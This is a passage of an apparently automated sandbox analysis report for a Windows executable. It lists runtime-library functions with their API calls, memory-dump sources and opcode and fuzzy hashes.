                                                                                                                                              • Part of subcall function 00301C42: _Maklocstr.LIBCPMT ref: 00301C7F
                                                                                                                                              • Part of subcall function 00301C42: _Maklocstr.LIBCPMT ref: 00301C9C
                                                                                                                                              • Part of subcall function 00301C42: _Maklocchr.LIBCPMT ref: 00301CAE
                                                                                                                                              • Part of subcall function 00301C42: _Maklocchr.LIBCPMT ref: 00301CC1
                                                                                                                                            • _Mpunct.LIBCPMT ref: 0030841A
                                                                                                                                            • _Mpunct.LIBCPMT ref: 00308434
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                            • String ID: $+xv
                                                                                                                                            • API String ID: 2939335142-1686923651
                                                                                                                                            • Opcode ID: 6424bdb94ebdcdef727f04088a332d6ef9ab491d6295839bd5e363e3a4346b48
                                                                                                                                            • Instruction ID: fb961716b4e9ee58b5be6a1ea6ededd6ca72f7423eef53fac33eae46d597f52c
                                                                                                                                            • Opcode Fuzzy Hash: 6424bdb94ebdcdef727f04088a332d6ef9ab491d6295839bd5e363e3a4346b48
                                                                                                                                            • Instruction Fuzzy Hash: 202177B1904B566FD726DF75C49077BBEF8AB0C700F04495AE499C7A82D734D641CB90
                                                                                                                                            Function 0030FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mpunct$H_prolog3
                                                                                                                                            • String ID: $+xv
                                                                                                                                            • API String ID: 4281374311-1686923651
                                                                                                                                            • Opcode ID: 6ac58a0874ebd4183de7a72e4373168dc66a8d41bedbcf12d888f1a8bd098585
                                                                                                                                            • Instruction ID: 75eafd9a89a011beb77fcdbc1e1fc9b4497eed76d8b05f32e33551d969e7cddf
                                                                                                                                            • Opcode Fuzzy Hash: 6ac58a0874ebd4183de7a72e4373168dc66a8d41bedbcf12d888f1a8bd098585
                                                                                                                                            • Instruction Fuzzy Hash: 9021B6B1904B516FD72ADF75C49077BBEF8AB0C300F04491AE099CBA42D774E641CB90
                                                                                                                                            Function 002F24C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,002F1434,?,00000000), ref: 002F2569
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,002F1434,?,00000000), ref: 002F2589
                                                                                                                                            • LocalFree.KERNEL32(?,002F1434,?,00000000), ref: 002F25DF
                                                                                                                                            • CloseHandle.KERNEL32(00000000,7642E7B1,?,00000000,00333C40,000000FF,00000008,?,?,?,?,002F1434,?,00000000), ref: 002F2633
                                                                                                                                            • LocalFree.KERNEL32(?,7642E7B1,?,00000000,00333C40,000000FF,00000008,?,?,?,?,002F1434), ref: 002F2647
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Local$AllocFree$CloseHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1291444452-0
                                                                                                                                            • Opcode ID: 4f94a25fbc5cd0767409fe344ad407b173957265510b3b676b90798c1ce3fc9e
                                                                                                                                            • Instruction ID: 50e1c3da51900a394ce69e892a32d4539c7d5dc5508e20ed5162fef736487f20
                                                                                                                                            • Opcode Fuzzy Hash: 4f94a25fbc5cd0767409fe344ad407b173957265510b3b676b90798c1ce3fc9e
                                                                                                                                            • Instruction Fuzzy Hash: CE41E972610219DBC7199F68D894ABAF7DCEB4A3A0F504639F626C72D0DB70D8588750
                                                                                                                                            Function 002FA910 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 377COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • LocalFree.KERNEL32(002F9C9B), ref: 002FACD1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeLocal
                                                                                                                                            • String ID: @T4$@T4$T4
                                                                                                                                            • API String ID: 2826327444-2191613505
                                                                                                                                            • Opcode ID: 75a45c7af7c9762fce773fa872b6d6ad5aa345836dc432be7440565a6ebc4b96
                                                                                                                                            • Instruction ID: 83e2e79e7dc7eb7413df9fd4b14d5e3963f44459ed06db75985529c512715276
                                                                                                                                            • Opcode Fuzzy Hash: 75a45c7af7c9762fce773fa872b6d6ad5aa345836dc432be7440565a6ebc4b96
                                                                                                                                            • Instruction Fuzzy Hash: 4DE19CB1A1024EDFDF14CFA8C884AEEFBB9FF08344F144069E919AB251D770A955CB61
                                                                                                                                            Function 00331D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetConsoleOutputCP.KERNEL32(7642E7B1,?,00000000,?), ref: 00331DFE
                                                                                                                                              • Part of subcall function 0032A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00326F5E,?,00000000,-00000008), ref: 0032AA67
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00332059
                                                                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 003320A1
                                                                                                                                            • GetLastError.KERNEL32 ref: 00332144
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                            • Opcode ID: 9bfb685b2d523cbb12eecdd7d5cf794f39ee867e70865304f712ff6e8c3f0e4f
                                                                                                                                            • Instruction ID: 70c51e91400760271fb430b4176c6181dc807cb7d78478a023741ae3cd91c6b2
                                                                                                                                            • Opcode Fuzzy Hash: 9bfb685b2d523cbb12eecdd7d5cf794f39ee867e70865304f712ff6e8c3f0e4f
                                                                                                                                            • Instruction Fuzzy Hash: 62D157B5D04258AFCB16CFA8D8C09EEBBB9FF09310F18456AE915EB351D730A945CB50
                                                                                                                                            Function 003224E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: cf32bb642c29218b67576a80e6df929616759348e9be1f7fa79397be9643a0d7
                                                                                                                                            • Instruction ID: 77d50dc67a382f63f05bc44539a117e847065a7903d94382e5b5be684f7716cf
                                                                                                                                            • Opcode Fuzzy Hash: cf32bb642c29218b67576a80e6df929616759348e9be1f7fa79397be9643a0d7
                                                                                                                                            • Instruction Fuzzy Hash: 8621D472604225BF9B27AF61EC61C6BB7ACBF463607228915F8158B250D730ED4097A0
                                                                                                                                            Function 002FCCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,7642E7B1), ref: 002FCD1C
                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 002FCD3C
                                                                                                                                            • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 002FCD6D
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 002FCD86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3604237281-0
                                                                                                                                            • Opcode ID: a63386174baa362dcdd5123ae6607dc3fec95ded39edf01f1e8e72c2be90b842
                                                                                                                                            • Instruction ID: 6b4149903175060e088a3ad7b9a5513eaf1ce5aab00b0699be6ade3a2ae27a9f
                                                                                                                                            • Opcode Fuzzy Hash: a63386174baa362dcdd5123ae6607dc3fec95ded39edf01f1e8e72c2be90b842
                                                                                                                                            • Instruction Fuzzy Hash: 4C21B1B4941719ABD7258F54DD4AFAEBBBCEB05B14F200629F600AB2C0D7B46A0587E4
                                                                                                                                            Function 00333686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00333053,?,00000001,?,?,?,00332198,?,?,00000000), ref: 0033369D
                                                                                                                                            • GetLastError.KERNEL32(?,00333053,?,00000001,?,?,?,00332198,?,?,00000000,?,?,?,0033271F,?), ref: 003336A9
                                                                                                                                              • Part of subcall function 0033366F: CloseHandle.KERNEL32(FFFFFFFE,003336B9,?,00333053,?,00000001,?,?,?,00332198,?,?,00000000,?,?), ref: 0033367F
                                                                                                                                            • ___initconout.LIBCMT ref: 003336B9
                                                                                                                                              • Part of subcall function 00333631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00333660,00333040,?,?,00332198,?,?,00000000,?), ref: 00333644
                                                                                                                                            • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00333053,?,00000001,?,?,?,00332198,?,?,00000000,?), ref: 003336CE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            • Opcode ID: 999be541b09842c4bb251b3a5a83c6938586383ae550f246cfd9a79995c3d19d
                                                                                                                                            • Instruction ID: b373ebd0e38f9e3ec5346fb27075d84d8252e63fa5823dcf1dc4519065e50ffb
                                                                                                                                            • Opcode Fuzzy Hash: 999be541b09842c4bb251b3a5a83c6938586383ae550f246cfd9a79995c3d19d
                                                                                                                                            • Instruction Fuzzy Hash: FFF03036504118BFCF632F95DC859993F6AFB093B1F018050FE199A230CA328920EB91
                                                                                                                                            Function 003086C7 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2548254987-1316489359
                                                                                                                                            • Opcode ID: 277c1dcc34f22c0c10fef372bebb4a41c6caace8c94efbdfb321638ceb7a9cec
                                                                                                                                            • Instruction ID: f9ef92b5e9357dfc7a1f913085d9b01a6626cfaa63b80f1eabd73b1674f157a6
                                                                                                                                            • Opcode Fuzzy Hash: 277c1dcc34f22c0c10fef372bebb4a41c6caace8c94efbdfb321638ceb7a9cec
                                                                                                                                            • Instruction Fuzzy Hash: F5A1AF7180120DDFCF16DFA4C990AEEBBB9FF08310F554429E844AB291DB30AE56CB60
                                                                                                                                            Function 002FF13C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 246COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_ctype
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2548254987-1316489359
                                                                                                                                            • Opcode ID: 6f0ad51a6805b99ba1de3b4de2cda96900452794403c866e7ab68fe78eb23d31
                                                                                                                                            • Instruction ID: 4ae028640f2baa0be47a4a3e2a5739e5f7e92b472b615e16d124e7d3294a3048
                                                                                                                                            • Opcode Fuzzy Hash: 6f0ad51a6805b99ba1de3b4de2cda96900452794403c866e7ab68fe78eb23d31
                                                                                                                                            • Instruction Fuzzy Hash: E6A1597592024EDFDF54DF94CA80AFEBBB9EF08380F140079E905A7251D770AA65CBA0
                                                                                                                                            Function 002FD41C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            • Opcode ID: 70130d96727ec4e66a878450cfb58930d12f3d5dc9a167987de9ec309188198a
                                                                                                                                            • Instruction ID: 79d9f27ea4ed3b15364a8501cbf1cccd050f1e39465dabdea35282d06b283b54
                                                                                                                                            • Opcode Fuzzy Hash: 70130d96727ec4e66a878450cfb58930d12f3d5dc9a167987de9ec309188198a
                                                                                                                                            • Instruction Fuzzy Hash: C371BD34D1425D9BDF15DFA4D0506FCFBB2AF19344F6840A9E9827B342DB30A956CB60
                                                                                                                                            Function 003015FB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            • Opcode ID: def0537d694bf009b8325fb9b7157535365fae73b0dcaa6afc34714490c09080
                                                                                                                                            • Instruction ID: 53933ee52a41737689f793855f975328cfd46c95107afd502f2d49c6324c8ad9
                                                                                                                                            • Opcode Fuzzy Hash: def0537d694bf009b8325fb9b7157535365fae73b0dcaa6afc34714490c09080
                                                                                                                                            • Instruction Fuzzy Hash: D971C134E0625C9FCF16DFA4C4A06EDBBB2AF49714F284099E8817B382DB315D46CB60
                                                                                                                                            Function 0030180A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            • Opcode ID: 263a5c988b58d10c746c12fc3ac629c8a0ef36ee92ce99a55b623fe90b90df54
                                                                                                                                            • Instruction ID: 879adab9dcdddacc495f965f0e7b3c633f85a7cc3820ea984ee8ae5406a88461
                                                                                                                                            • Opcode Fuzzy Hash: 263a5c988b58d10c746c12fc3ac629c8a0ef36ee92ce99a55b623fe90b90df54
                                                                                                                                            • Instruction Fuzzy Hash: 26717234E062189BCF1ADF94D4A06FDBBB2BF59710F554059E882BB2C1DB345D82CB90
                                                                                                                                            Function 00301A26 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: H_prolog3_Initstd::locale::_
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3382595777-1316489359
                                                                                                                                            • Opcode ID: a69c312833009669e6b035f72738e93616548de052227e897ce92844a9ae183c
                                                                                                                                            • Instruction ID: e612f4d0857af58b3f0ed6b21daaa632658974047c2c9a47435fc4515b3184c1
                                                                                                                                            • Opcode Fuzzy Hash: a69c312833009669e6b035f72738e93616548de052227e897ce92844a9ae183c
                                                                                                                                            • Instruction Fuzzy Hash: 2E718E34E062589BCF1ADF94D4A0AFDBBB1BF59310F554059E842BB2C1EB345D82CB60
                                                                                                                                            Function 00311E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __aulldiv
                                                                                                                                            • String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
                                                                                                                                            • API String ID: 3732870572-1956417402
                                                                                                                                            • Opcode ID: 9293bd255f498d9057af03925e5fe80cbf85a19a0c5158f3216a53bec7fce61c
                                                                                                                                            • Instruction ID: 523a6022f83b3aab5ddb0287602675eb86307927246a2bc729f34210521ebc40
                                                                                                                                            • Opcode Fuzzy Hash: 9293bd255f498d9057af03925e5fe80cbf85a19a0c5158f3216a53bec7fce61c
                                                                                                                                            • Instruction Fuzzy Hash: 9351D370B042459ADF2F8FA894817FEBBBA5F0D340F15465AEA91D7241C37089C2CB61
                                                                                                                                            Function 002FBD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 002FBF6E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                            • String ID: false$true
                                                                                                                                            • API String ID: 118556049-2658103896
                                                                                                                                            • Opcode ID: 2026a7790c26308e47ea4276267e2af4c61ebb9f8f3b78d8fea42bfb706584f0
                                                                                                                                            • Instruction ID: 1b4c53eb7d8a591d8e32c9eedf4ed3a28e494bbdabbe5a46cdad2f561a2fb868
